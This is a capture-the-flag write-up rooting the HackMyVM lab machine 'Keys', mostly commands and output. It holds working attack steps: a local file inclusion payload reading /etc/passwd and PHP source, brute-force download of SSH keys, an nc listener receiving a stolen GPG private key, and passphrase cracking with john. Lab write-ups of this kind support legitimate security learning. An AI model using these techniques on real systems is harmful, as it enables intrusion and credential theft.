NOTES ABOUT Keys

[ 2022-12-05 ] [ HackMyVM / Keys ]

Status: Rooted
Skills: Port Scanning, Fuzzing, LFI, SSH, GPG, Bash Scripting
Tools: nmap, gobuster

PORT SCANNING

$ nmap -sCSV -p- 10.0.2.48

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 6e:b1:d1:09:f5:dc:01:29:ed:9d:4f:8e:a7:7a:a0:a6 (RSA)
|   256 35:f4:29:df:64:6a:be:7f:9f:0a:9f:ee:07:e4:19:07 (ECDSA)
|_  256 4e:0f:f7:32:cc:c7:91:57:07:d9:50:0a:38:c9:e5:11 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: The World of Keys
|_http-server-header: nginx/1.18.0

GETTING IN

$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml -u http://10.0.2.48           
/index.html           (Status: 200) [Size: 135]
/readme.php           (Status: 200) [Size: 398]


$ curl 10.0.2.48
[...]
<img src="world_of_keys.jpg" alt="keys" height="685">
[...]

$ curl 10.0.2.48/readme.php
[...]
    <p>[ Read Me. ]</p>
    <!-- Here is a Gift for you Ayr43KwSdwpWQw6HFce8SaMmpWH12XsUF -->
[...]

https://gchq.github.io/CyberChef/#recipe=Magic(3,false,false,'')&input=QXlyNDNLd1Nkd3BXUXc2SEZjZThTYU1tcFdIMTJYc1VG

$ wget  10.0.2.48/my_personal_wordlist.txt

$ gobuster -q fuzz -w ./my_personal_wordlist.txt -u http://10.0.2.48/readme.php?FUZZ=/etc/passwd --exclude-length 398
Found: [Status=200] [Length=2004] http://10.0.2.48/readme.php?****=/etc/passwd

$ curl http://10.0.2.48/readme.php?****=php://filter/convert.base64-encode/resource=readme.php

$ echo "PCFET0NUWVBFIGh0bWw+[...]Ao/Pgo=" | base64 -dd
[...]
<?php
    include($_GET['****']);
    // The World of Keys are Here yCQlSq/+(Uq/+(UqV
    // I Love Z85 (ZeroMQ) :)
    // one more gift for you :) id_rsa.zip
?>

https://gchq.github.io/CyberChef/#recipe=Magic(3,false,false,'')&input=eUNRbFNxLysoVXEvKyhVcVY

$ for i in $(seq 1000 9999) do; curl -s "http://10.0.2.48/k3ysSsSsSsSsS/id_rsa-$i" -O;

$ find . -type f -exec cksum {} + | awk '!ck[$1$2]++ { print $3 }'
./id_rsa-6407
./id_rsa-***5

$ cat ./id_rsa_files/id_rsa-***5
HaHa you found me :)

here is a little note for you:-

If you get stuck, Remember I'm here just for you

$ curl -s http://10.0.2.48/readme.php?****=/etc/passwd | grep bash | awk -F':' '{print $1}'    
root
steve
jack
rachel
useless

$ wget http://10.0.2.48/id_rsa.zip
$ unzip id_rsa.zip

$ find ./id_rsa_files/id_rsa -name "*-***5" | xargs -I{} cp {} ./

$ ssh steve@10.0.2.48 -i ./*********************************-***5

steve@keys:~$ cat u__s__e__r.txt 
***************VDll6

ELEVATING PRIVILEGES

steve@keys:~$ find / -xdev -group steve 2>/dev/null
/opt/number_guessing_game.py
/var/mail/private_key.gpg
/etc/ssh/ssh_config.d/.steve_id_rsa.pub
/home/steve
/home/steve/.bash_logout
/home/steve/.bashrc
/home/steve/.profile
/home/steve/.ssh
/home/steve/.ssh/just_keys
/home/steve/u__s__e__r.txt
/home/steve/.important_message.asc

CRACKING GPG PASSPHRASE

$ nc -lvnp 443 > private_key.gpg
listening on [any] 443 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.48] 51208
^C

$ gpg2john private_key.gpg > private_key.gpg.hash

$ john --wordlist=/usr/share/wordlists/rockyou.txt ./private_key.gpg.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 3 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
********         (root@keys.com)     
Use the "--show" option to display all of the cracked passwords reliably
Session completed

steve@keys:~$ gpg --import /var/mail/private_key.gpg
gpg: directory '/home/steve/.gnupg' created
gpg: keybox '/home/steve/.gnupg/pubring.kbx' created
gpg: /home/steve/.gnupg/trustdb.gpg: trustdb created
gpg: key A075831A574B572D: public key "root@keys.com" imported
gpg: key A075831A574B572D: secret key imported

steve@keys:~$ gpg --decrypt ./.important_message.asc
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 2048-bit RSA key, ID A075831A574B572D, created 2021-10-28
      "root@keys.com"
Root Password is *****************gpg: WARNING: message was not integrity protected
gpg: Hint: If this message was created before the year 2003 it is
     likely that this message is legitimate.  This is because back
     then integrity protection was not widely used.
gpg: Use the option '--ignore-mdc-error' to decrypt anyway.
gpg: decryption forced to fail!

steve@keys:~$ su root
Password: 
root@keys:/home/steve# cd
root@keys:~# cat ro0ot.txt 
**************

FULL USER FLAG

root@keys:~# find /home/ -name "*.txt" -exec cat {} +
**********7Q6Pw*****
***************VDll6
I love to share my personal stuff with my friends :)
********************
*****rYnYT**********

root@keys:~# systemctl poweroff
root@keys:~# Connection to 10.0.2.48 closed by remote host.
Connection to 10.0.2.48 closed.

BEAUTIFUL MACHINE <3


--- Loaded 392 times ---